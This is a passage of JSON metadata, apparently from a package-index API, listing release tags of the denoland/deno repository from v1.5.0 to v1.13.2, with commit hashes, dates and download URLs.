g:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/